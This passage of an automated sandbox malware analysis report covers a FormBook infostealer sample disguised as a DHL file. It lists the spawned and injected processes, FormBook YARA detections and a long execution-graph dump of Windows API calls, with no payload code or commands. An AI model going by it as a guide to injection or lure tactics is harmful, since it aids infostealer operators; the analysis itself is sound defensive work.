                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></ht
Dec 7, 2024 07:03:56.384907007 CET | 4 | IN | Data Raw: 6d 6c 3e 0a
                                                                                  Data Ascii: ml>



                                                                                  Target ID:0
                                                                                  Start time:00:59:56
                                                                                  Start date:07/12/2024
                                                                                  Path:C:\Users\user\Desktop\DHL 40312052024.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\DHL 40312052024.exe"
                                                                                  Imagebase:0x7b0000
                                                                                  File size:1'202'688 bytes
                                                                                  MD5 hash:76D2944F234154FA8D4C251EC4C621BE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:00:59:59
                                                                                  Start date:07/12/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\DHL 40312052024.exe"
                                                                                  Imagebase:0xeb0000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2201456108.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2201456108.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2202258982.0000000003650000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2202258982.0000000003650000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2202388210.0000000004090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2202388210.0000000004090000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:01:00:06
                                                                                  Start date:07/12/2024
                                                                                  Path:C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe"
                                                                                  Imagebase:0x5a0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4473431930.0000000003090000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4473431930.0000000003090000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:4
                                                                                  Start time:01:00:08
                                                                                  Start date:07/12/2024
                                                                                  Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                                  Imagebase:0x760000
                                                                                  File size:22'016 bytes
                                                                                  MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4472233099.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4472233099.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4473466571.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4473466571.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4473348288.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4473348288.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Target ID:6
                                                                                  Start time:01:00:22
                                                                                  Start date:07/12/2024
                                                                                  Path:C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe"
                                                                                  Imagebase:0x5a0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4475242478.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4475242478.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:7
                                                                                  Start time:01:00:34
                                                                                  Start date:07/12/2024
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x7ff79f9e0000
                                                                                  File size:676'768 bytes
                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true


                                                                                    Execution Graph

                                                                                    Execution Coverage:3.6%
                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                    Signature Coverage:8.7%
                                                                                    Total number of Nodes:2000
                                                                                    Total number of Limit Nodes:60
calls Mailbox 101871->101872 101872->101819 101873->101824 101874->101824 101875->101824 101876->101796 101877->101824 101879 7b7e62 101878->101879 101881 7b7e5f _memmove 101878->101881 101880 7d0db6 Mailbox 59 API calls 101879->101880 101880->101881 101881->101828 101883 80f192 __wsetenvp 101882->101883 101884 80f1d1 101883->101884 101886 80f1c7 101883->101886 101888 80f278 101883->101888 101884->101837 101889 7b7667 101884->101889 101886->101884 101912 7b78c4 61 API calls 101886->101912 101888->101884 101913 7b78c4 61 API calls 101888->101913 101890 7d0db6 Mailbox 59 API calls 101889->101890 101891 7b7688 101890->101891 101892 7d0db6 Mailbox 59 API calls 101891->101892 101893 7b7696 101892->101893 101894 7b784b 101893->101894 101895 7b785a 101894->101895 101896 7b78b7 101894->101896 101895->101896 101898 7b7865 101895->101898 101897 7b7d2c 59 API calls 101896->101897 101899 7b7888 _memmove 101897->101899 101900 7eeb09 101898->101900 101901 7b7880 101898->101901 101899->101835 101915 7b8029 101900->101915 101914 7b7f27 59 API calls Mailbox 101901->101914 101904 7eeb13 101905 7d0db6 Mailbox 59 API calls 101904->101905 101906 7eeb33 101905->101906 101908 7b7d3a 101907->101908 101910 7b7d43 _memmove 101907->101910 101909 7b7e4f 59 API calls 101908->101909 101908->101910 101909->101910 101910->101837 101911->101838 101912->101886 101913->101888 101914->101899 101916 7d0db6 Mailbox 59 API calls 101915->101916 101917 7b8033 101916->101917 101917->101904 101918->101851 101919->101866 101921 7b9169 Mailbox 101920->101921 101922 7ef19f 101921->101922 101926 7b9173 101921->101926 101923 7d0db6 Mailbox 59 API calls 101922->101923 101925 7ef1ab 101923->101925 101924 7b917a 101924->101870 101926->101924 101928 7b9c90 59 API calls Mailbox 101926->101928 101928->101926 101929->101764 101930->101764 101931->101759 101932->101765 101933->101770 101934->101765 101935 7b107d 101940 7b708b 101935->101940 101937 7b108c 101971 7d2d40 101937->101971 101941 7b709b __ftell_nolock 
101940->101941 101942 7b7667 59 API calls 101941->101942 101943 7b7151 101942->101943 101974 7b4706 101943->101974 101945 7b715a 101981 7d050b 101945->101981 101952 7b7667 59 API calls 101953 7b718b 101952->101953 102000 7b7d8c 101953->102000 101955 7b7194 RegOpenKeyExW 101956 7ee8b1 RegQueryValueExW 101955->101956 101960 7b71b6 Mailbox 101955->101960 101957 7ee8ce 101956->101957 101958 7ee943 RegCloseKey 101956->101958 101959 7d0db6 Mailbox 59 API calls 101957->101959 101958->101960 101970 7ee955 _wcscat Mailbox __wsetenvp 101958->101970 101961 7ee8e7 101959->101961 101960->101937 102004 7b522e 101961->102004 101964 7ee90f 102007 7b7bcc 101964->102007 101966 7b79f2 59 API calls 101966->101970 101967 7ee929 101967->101958 101968 7b7de1 59 API calls 101968->101970 101969 7b3f74 59 API calls 101969->101970 101970->101960 101970->101966 101970->101968 101970->101969 102038 7d2c44 101971->102038 101973 7b1096 102016 7e1940 101974->102016 101977 7b7de1 59 API calls 101978 7b4739 101977->101978 102018 7b4750 101978->102018 101980 7b4743 Mailbox 101980->101945 101982 7e1940 __ftell_nolock 101981->101982 101983 7d0518 GetFullPathNameW 101982->101983 101984 7d053a 101983->101984 101985 7b7bcc 59 API calls 101984->101985 101986 7b7165 101985->101986 101987 7b7cab 101986->101987 101988 7eed4a 101987->101988 101989 7b7cbf 101987->101989 101991 7b8029 59 API calls 101988->101991 102032 7b7c50 101989->102032 101993 7eed55 __wsetenvp _memmove 101991->101993 101992 7b7173 101994 7b3f74 101992->101994 101995 7b3f82 101994->101995 101999 7b3fa4 _memmove 101994->101999 101997 7d0db6 Mailbox 59 API calls 101995->101997 101996 7d0db6 Mailbox 59 API calls 101998 7b3fb8 101996->101998 101997->101999 101998->101952 101999->101996 102001 7b7d99 102000->102001 102002 7b7da6 102000->102002 102001->101955 102003 7d0db6 Mailbox 59 API calls 102002->102003 102003->102001 102005 7d0db6 Mailbox 59 API calls 102004->102005 102006 7b5240 RegQueryValueExW 102005->102006 102006->101964 102006->101967 
102008 7b7bd8 __wsetenvp 102007->102008 102009 7b7c45 102007->102009 102011 7b7bee 102008->102011 102012 7b7c13 102008->102012 102010 7b7d2c 59 API calls 102009->102010 102015 7b7bf6 _memmove 102010->102015 102037 7b7f27 59 API calls Mailbox 102011->102037 102014 7b8029 59 API calls 102012->102014 102014->102015 102015->101967 102017 7b4713 GetModuleFileNameW 102016->102017 102017->101977 102019 7e1940 __ftell_nolock 102018->102019 102020 7b475d GetFullPathNameW 102019->102020 102021 7b4799 102020->102021 102022 7b477c 102020->102022 102024 7b7d8c 59 API calls 102021->102024 102023 7b7bcc 59 API calls 102022->102023 102025 7b4788 102023->102025 102024->102025 102028 7b7726 102025->102028 102029 7b7734 102028->102029 102030 7b7d2c 59 API calls 102029->102030 102031 7b4794 102030->102031 102031->101980 102033 7b7c5f __wsetenvp 102032->102033 102034 7b8029 59 API calls 102033->102034 102035 7b7c70 _memmove 102033->102035 102036 7eed07 _memmove 102034->102036 102035->101992 102037->102015 102039 7d2c50 _fprintf 102038->102039 102046 7d3217 102039->102046 102045 7d2c77 _fprintf 102045->101973 102063 7d9c0b 102046->102063 102048 7d2c59 102049 7d2c88 DecodePointer DecodePointer 102048->102049 102050 7d2cb5 102049->102050 102051 7d2c65 102049->102051 102050->102051 102115 7d87a4 59 API calls 2 library calls 102050->102115 102060 7d2c82 102051->102060 102053 7d2d18 EncodePointer EncodePointer 102053->102051 102054 7d2cc7 102054->102053 102056 7d2cec 102054->102056 102116 7d8864 61 API calls 2 library calls 102054->102116 102056->102051 102058 7d2d06 EncodePointer 102056->102058 102117 7d8864 61 API calls 2 library calls 102056->102117 102058->102053 102059 7d2d00 102059->102051 102059->102058 102118 7d3220 102060->102118 102064 7d9c1c 102063->102064 102065 7d9c2f EnterCriticalSection 102063->102065 102070 7d9c93 102064->102070 102065->102048 102067 7d9c22 102067->102065 102094 7d30b5 58 API calls 3 library calls 102067->102094 102071 7d9c9f _fprintf 102070->102071 102072 
7d9ca8 102071->102072 102073 7d9cc0 102071->102073 102095 7da16b 58 API calls 2 library calls 102072->102095 102082 7d9ce1 _fprintf 102073->102082 102098 7d881d 102073->102098 102075 7d9cad 102096 7da1c8 58 API calls 8 library calls 102075->102096 102079 7d9cb4 102097 7d309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 102079->102097 102080 7d9cdc 102104 7d8b28 58 API calls __getptd_noexit 102080->102104 102081 7d9ceb 102085 7d9c0b __lock 58 API calls 102081->102085 102082->102067 102086 7d9cf2 102085->102086 102088 7d9cff 102086->102088 102089 7d9d17 102086->102089 102105 7d9e2b InitializeCriticalSectionAndSpinCount 102088->102105 102106 7d2d55 102089->102106 102092 7d9d0b 102112 7d9d33 LeaveCriticalSection _doexit 102092->102112 102095->102075 102096->102079 102101 7d882b 102098->102101 102099 7d571c _W_store_winword 58 API calls 102099->102101 102100 7d885d 102100->102080 102100->102081 102101->102099 102101->102100 102103 7d883e 102101->102103 102103->102100 102103->102101 102113 7da132 Sleep 102103->102113 102104->102082 102105->102092 102107 7d2d5e RtlFreeHeap 102106->102107 102108 7d2d87 _free 102106->102108 102107->102108 102109 7d2d73 102107->102109 102108->102092 102114 7d8b28 58 API calls __getptd_noexit 102109->102114 102111 7d2d79 GetLastError 102111->102108 102112->102082 102113->102103 102114->102111 102115->102054 102116->102056 102117->102059 102121 7d9d75 LeaveCriticalSection 102118->102121 102120 7d2c87 102120->102045 102121->102120 102122 7b3633 102123 7b366a 102122->102123 102124 7b3688 102123->102124 102125 7b36e7 102123->102125 102161 7b36e5 102123->102161 102126 7b374b PostQuitMessage 102124->102126 102127 7b3695 102124->102127 102129 7ed0cc 102125->102129 102130 7b36ed 102125->102130 102163 7b36d8 102126->102163 102134 7ed154 102127->102134 102135 7b36a0 102127->102135 102128 7b36ca DefWindowProcW 102128->102163 102177 7c1070 10 API calls Mailbox 102129->102177 102131 7b36f2 102130->102131 102132 7b3715 SetTimer 
RegisterWindowMessageW 102130->102132 102136 7ed06f 102131->102136 102137 7b36f9 KillTimer 102131->102137 102139 7b373e CreatePopupMenu 102132->102139 102132->102163 102193 812527 71 API calls _memset 102134->102193 102140 7b36a8 102135->102140 102141 7b3755 102135->102141 102149 7ed0a8 MoveWindow 102136->102149 102150 7ed074 102136->102150 102174 7b443a Shell_NotifyIconW _memset 102137->102174 102138 7ed0f3 102178 7c1093 331 API calls Mailbox 102138->102178 102139->102163 102145 7ed139 102140->102145 102146 7b36b3 102140->102146 102167 7b44a0 102141->102167 102145->102128 102192 807c36 59 API calls Mailbox 102145->102192 102152 7ed124 102146->102152 102162 7b36be 102146->102162 102147 7ed166 102147->102128 102147->102163 102149->102163 102153 7ed078 102150->102153 102154 7ed097 SetFocus 102150->102154 102151 7b370c 102175 7b3114 DeleteObject DestroyWindow Mailbox 102151->102175 102191 812d36 81 API calls _memset 102152->102191 102158 7ed081 102153->102158 102153->102162 102154->102163 102176 7c1070 10 API calls Mailbox 102158->102176 102160 7ed134 102160->102163 102161->102128 102162->102128 102179 7b443a Shell_NotifyIconW _memset 102162->102179 102165 7ed118 102180 7b434a 102165->102180 102168 7b4539 102167->102168 102169 7b44b7 _memset 102167->102169 102168->102163 102194 7b407c 102169->102194 102171 7b4522 KillTimer SetTimer 102171->102168 102172 7b44de 102172->102171 102173 7ed4ab Shell_NotifyIconW 102172->102173 102173->102171 102174->102151 102175->102163 102176->102163 102177->102138 102178->102162 102179->102165 102181 7b4375 _memset 102180->102181 102221 7b4182 102181->102221 102184 7b43fa 102186 7b4430 Shell_NotifyIconW 102184->102186 102187 7b4414 Shell_NotifyIconW 102184->102187 102188 7b4422 102186->102188 102187->102188 102189 7b407c 61 API calls 102188->102189 102190 7b4429 102189->102190 102190->102161 102191->102160 102192->102161 102193->102147 102195 7b4098 102194->102195 102196 7b416f Mailbox 102194->102196 102216 7b7a16 102195->102216 
102196->102172 102199 7ed3c8 LoadStringW 102203 7ed3e2 102199->102203 102200 7b40b3 102201 7b7bcc 59 API calls 102200->102201 102202 7b40c8 102201->102202 102202->102203 102204 7b40d9 102202->102204 102205 7b7b2e 59 API calls 102203->102205 102206 7b40e3 102204->102206 102207 7b4174 102204->102207 102210 7ed3ec 102205->102210 102209 7b7b2e 59 API calls 102206->102209 102208 7b8047 59 API calls 102207->102208 102213 7b40ed _memset _wcscpy 102208->102213 102209->102213 102211 7b7cab 59 API calls 102210->102211 102210->102213 102212 7ed40e 102211->102212 102215 7b7cab 59 API calls 102212->102215 102214 7b4155 Shell_NotifyIconW 102213->102214 102214->102196 102215->102213 102217 7d0db6 Mailbox 59 API calls 102216->102217 102218 7b7a3b 102217->102218 102219 7b8029 59 API calls 102218->102219 102220 7b40a6 102219->102220 102220->102199 102220->102200 102222 7ed423 102221->102222 102223 7b4196 102221->102223 102222->102223 102224 7ed42c DestroyIcon 102222->102224 102223->102184 102225 812f94 62 API calls _W_store_winword 102223->102225 102224->102223 102225->102184 102226 7efe27 102239 7cf944 102226->102239 102228 7efe3d 102229 7efebe 102228->102229 102230 7efe53 102228->102230 102248 7bfce0 102229->102248 102328 7b9e5d 60 API calls 102230->102328 102232 7efe92 102233 7f089c 102232->102233 102234 7efe9a 102232->102234 102330 819e4a 89 API calls 4 library calls 102233->102330 102329 81834f 59 API calls Mailbox 102234->102329 102237 7efeb2 Mailbox 102240 7cf950 102239->102240 102241 7cf962 102239->102241 102331 7b9d3c 60 API calls Mailbox 102240->102331 102243 7cf968 102241->102243 102244 7cf991 102241->102244 102245 7d0db6 Mailbox 59 API calls 102243->102245 102332 7b9d3c 60 API calls Mailbox 102244->102332 102247 7cf95a 102245->102247 102247->102228 102333 7b8180 102248->102333 102250 7bfd3d 102251 7f472d 102250->102251 102313 7c06f6 102250->102313 102338 7bf234 102250->102338 102432 819e4a 89 API calls 4 library calls 102251->102432 102255 7bfe3e 102256 7f488d 
102255->102256 102261 7bfe4c 102255->102261 102436 8066ec 59 API calls 2 library calls 102255->102436 102256->102261 102312 7f4742 102256->102312 102438 82a2d9 85 API calls Mailbox 102256->102438 102257 7c0517 102266 7d0db6 Mailbox 59 API calls 102257->102266 102258 7f4b53 102258->102312 102453 819e4a 89 API calls 4 library calls 102258->102453 102260 7f47d7 102260->102312 102434 819e4a 89 API calls 4 library calls 102260->102434 102261->102258 102267 7f48f9 102261->102267 102342 7b837c 102261->102342 102263 7f4848 102437 8060ef 59 API calls 2 library calls 102263->102437 102274 7c0545 _memmove 102266->102274 102275 7f4917 102267->102275 102440 7b85c0 59 API calls Mailbox 102267->102440 102270 7f4755 102270->102260 102433 7bf6a3 331 API calls 102270->102433 102272 7f48b2 Mailbox 102272->102261 102439 8066ec 59 API calls 2 library calls 102272->102439 102282 7d0db6 Mailbox 59 API calls 102274->102282 102279 7f4928 102275->102279 102441 7b85c0 59 API calls Mailbox 102275->102441 102276 7bfea4 102285 7f4ad6 102276->102285 102286 7bff32 102276->102286 102305 7c0179 Mailbox _memmove 102276->102305 102277 7f486b 102280 7b9ea0 331 API calls 102277->102280 102279->102305 102442 8060ab 59 API calls Mailbox 102279->102442 102280->102256 102281 7d0db6 59 API calls Mailbox 102289 7bfdd3 102281->102289 102306 7c0106 _memmove 102282->102306 102451 819ae7 60 API calls 102285->102451 102287 7d0db6 Mailbox 59 API calls 102286->102287 102292 7bff39 102287->102292 102289->102255 102289->102257 102289->102270 102289->102274 102289->102281 102291 7b9ea0 331 API calls 102289->102291 102301 7f480c 102289->102301 102289->102312 102291->102289 102292->102313 102349 7c09d0 102292->102349 102293 7bffe6 102307 7c0007 102293->102307 102311 7b8047 59 API calls 102293->102311 102294 7b9ea0 331 API calls 102295 7f4a87 102294->102295 102295->102312 102446 7b84c0 102295->102446 102297 7bffb2 102297->102274 102297->102293 102297->102313 102435 819e4a 89 API calls 4 library calls 102301->102435 
102304 7f4ab2 102450 819e4a 89 API calls 4 library calls 102304->102450 102305->102304 102305->102313 102314 7d0db6 59 API calls Mailbox 102305->102314 102315 7c0398 102305->102315 102321 7f4a1c 102305->102321 102325 7f4a4d 102305->102325 102428 7b8740 68 API calls __cinit 102305->102428 102429 7b8660 68 API calls 102305->102429 102443 815937 68 API calls 102305->102443 102444 7b89b3 69 API calls Mailbox 102305->102444 102445 7b9d3c 60 API calls Mailbox 102305->102445 102306->102305 102327 7c0162 102306->102327 102430 7b9c90 59 API calls Mailbox 102306->102430 102307->102313 102316 7f4b24 102307->102316 102318 7c004c 102307->102318 102311->102307 102431 819e4a 89 API calls 4 library calls 102313->102431 102314->102305 102315->102237 102452 7b9d3c 60 API calls Mailbox 102316->102452 102318->102258 102318->102313 102319 7c00d8 102318->102319 102426 7b9d3c 60 API calls Mailbox 102319->102426 102324 7d0db6 Mailbox 59 API calls 102321->102324 102322 7c00eb 102322->102313 102427 7b82df 59 API calls Mailbox 102322->102427 102324->102325 102325->102294 102327->102237 102328->102232 102329->102237 102330->102237 102331->102247 102332->102247 102334 7b818f 102333->102334 102337 7b81aa 102333->102337 102335 7b7e4f 59 API calls 102334->102335 102336 7b8197 CharUpperBuffW 102335->102336 102336->102337 102337->102250 102339 7bf251 102338->102339 102340 7bf272 102339->102340 102454 819e4a 89 API calls 4 library calls 102339->102454 102340->102289 102343 7eedbd 102342->102343 102344 7b838d 102342->102344 102345 7d0db6 Mailbox 59 API calls 102344->102345 102346 7b8394 102345->102346 102347 7b83b5 102346->102347 102455 7b8634 59 API calls Mailbox 102346->102455 102347->102267 102347->102276 102350 7f4cc3 102349->102350 102362 7c09f5 102349->102362 102515 819e4a 89 API calls 4 library calls 102350->102515 102352 7c0ce4 102353 7c0cfa 102352->102353 102512 7c1070 10 API calls Mailbox 102352->102512 102353->102297 102355 7c0ee4 102355->102353 102357 7c0ef1 102355->102357 102513 7c1093 
331 API calls Mailbox 102357->102513 102358 7c0a4b PeekMessageW 102424 7c0a05 Mailbox 102358->102424 102360 7c0ef8 LockWindowUpdate DestroyWindow GetMessageW 102360->102353 102364 7c0f2a 102360->102364 102362->102424 102516 7b9e5d 60 API calls 102362->102516 102517 806349 331 API calls 102362->102517 102363 7f4e81 Sleep 102363->102424 102366 7f5c58 TranslateMessage DispatchMessageW GetMessageW 102364->102366 102366->102366 102367 7f5c88 102366->102367 102367->102353 102368 7c0ea5 TranslateMessage DispatchMessageW 102369 7c0e43 PeekMessageW 102368->102369 102369->102424 102370 7f4d50 TranslateAcceleratorW 102370->102369 102370->102424 102372 7c0d13 timeGetTime 102372->102424 102373 7f581f WaitForSingleObject 102375 7f583c GetExitCodeProcess CloseHandle 102373->102375 102373->102424 102374 7b7667 59 API calls 102410 7c0e70 Mailbox 102374->102410 102408 7c0f95 102375->102408 102376 7c0e5f Sleep 102376->102410 102377 7b8047 59 API calls 102377->102424 102379 7d0db6 59 API calls Mailbox 102379->102424 102380 7f5af8 Sleep 102380->102410 102382 7d049f timeGetTime 102382->102410 102383 7c0f4e timeGetTime 102514 7b9e5d 60 API calls 102383->102514 102386 7f5b8f GetExitCodeProcess 102388 7f5bbb CloseHandle 102386->102388 102389 7f5ba5 WaitForSingleObject 102386->102389 102387 7b9837 84 API calls 102387->102424 102388->102410 102389->102388 102389->102424 102392 835f25 110 API calls 102392->102410 102393 7bb7dd 109 API calls 102393->102410 102394 7f5874 102394->102408 102395 7f5c17 Sleep 102395->102424 102396 7f5078 Sleep 102396->102424 102398 7b7de1 59 API calls 102398->102410 102401 7b9e5d 60 API calls 102401->102424 102403 7b9ea0 304 API calls 102403->102424 102406 7bfce0 304 API calls 102406->102424 102408->102297 102410->102374 102410->102382 102410->102386 102410->102392 102410->102393 102410->102394 102410->102395 102410->102396 102410->102398 102410->102408 102410->102424 102524 812408 60 API calls 102410->102524 102525 7b9e5d 60 API calls 102410->102525 102526 7b89b3 
69 API calls Mailbox 102410->102526 102527 7bb73c 331 API calls 102410->102527 102528 8064da 60 API calls 102410->102528 102529 815244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 102410->102529 102530 813c55 66 API calls Mailbox 102410->102530 102411 819e4a 89 API calls 102411->102424 102413 7b84c0 69 API calls 102413->102424 102414 7b89b3 69 API calls 102414->102424 102415 7b9c90 59 API calls Mailbox 102415->102424 102416 80617e 59 API calls Mailbox 102416->102424 102418 7b7de1 59 API calls 102418->102424 102419 7f55d5 VariantClear 102419->102424 102420 7f566b VariantClear 102420->102424 102421 806e8f 59 API calls 102421->102424 102422 7b8cd4 59 API calls Mailbox 102422->102424 102423 7f5419 VariantClear 102423->102424 102424->102352 102424->102358 102424->102363 102424->102368 102424->102369 102424->102370 102424->102372 102424->102373 102424->102376 102424->102377 102424->102379 102424->102380 102424->102383 102424->102387 102424->102401 102424->102403 102424->102406 102424->102408 102424->102410 102424->102411 102424->102413 102424->102414 102424->102415 102424->102416 102424->102418 102424->102419 102424->102420 102424->102421 102424->102422 102424->102423 102425 7bb73c 304 API calls 102424->102425 102456 7be6a0 102424->102456 102487 7bf460 102424->102487 102506 7b31ce 102424->102506 102511 7be420 331 API calls 102424->102511 102518 836018 59 API calls 102424->102518 102519 819a15 59 API calls Mailbox 102424->102519 102520 80d4f2 59 API calls 102424->102520 102521 8060ef 59 API calls 2 library calls 102424->102521 102522 7b8401 59 API calls 102424->102522 102523 7b82df 59 API calls Mailbox 102424->102523 102425->102424 102426->102322 102427->102306 102428->102305 102429->102305 102430->102306 102431->102251 102432->102312 102433->102260 102434->102312 102435->102312 102436->102263 102437->102277 102438->102272 102439->102272 102440->102275 102441->102279 102442->102305 102443->102305 102444->102305 102445->102305 
102447 7b84cb 102446->102447 102449 7b84f2 102447->102449 103443 7b89b3 69 API calls Mailbox 102447->103443 102449->102304 102450->102312 102451->102293 102452->102258 102453->102312 102454->102340 102455->102347 102457 7be6d5 102456->102457 102458 7f3aa9 102457->102458 102461 7be73f 102457->102461 102465 7be799 102457->102465 102459 7b9ea0 331 API calls 102458->102459 102460 7f3abe 102459->102460 102486 7be970 Mailbox 102460->102486 102532 819e4a 89 API calls 4 library calls 102460->102532 102464 7b7667 59 API calls 102461->102464 102461->102465 102462 7b7667 59 API calls 102462->102465 102466 7f3b04 102464->102466 102465->102462 102467 7d2d40 __cinit 67 API calls 102465->102467 102468 7f3b26 102465->102468 102473 7be95a 102465->102473 102465->102486 102469 7d2d40 __cinit 67 API calls 102466->102469 102467->102465 102468->102424 102469->102465 102470 819e4a 89 API calls 102470->102486 102471 7b84c0 69 API calls 102471->102486 102472 7b9ea0 331 API calls 102472->102486 102473->102486 102533 819e4a 89 API calls 4 library calls 102473->102533 102475 7b8d40 59 API calls 102475->102486 102482 7bf195 102537 819e4a 89 API calls 4 library calls 102482->102537 102484 7f3e25 102484->102424 102485 7bea78 102485->102424 102486->102470 102486->102471 102486->102472 102486->102475 102486->102482 102486->102485 102531 7b7f77 59 API calls 2 library calls 102486->102531 102534 806e8f 59 API calls 102486->102534 102535 82c5c3 331 API calls 102486->102535 102536 82b53c 331 API calls Mailbox 102486->102536 102538 7b9c90 59 API calls Mailbox 102486->102538 102539 8293c6 331 API calls Mailbox 102486->102539 102488 7bf4ba 102487->102488 102489 7bf650 102487->102489 102490 7f441e 102488->102490 102491 7bf4c6 102488->102491 102492 7b7de1 59 API calls 102489->102492 102640 82bc6b 331 API calls Mailbox 102490->102640 102638 7bf290 331 API calls 2 library calls 102491->102638 102498 7bf58c Mailbox 102492->102498 102495 7f442c 102499 7bf630 102495->102499 102641 819e4a 89 API calls 4 library 
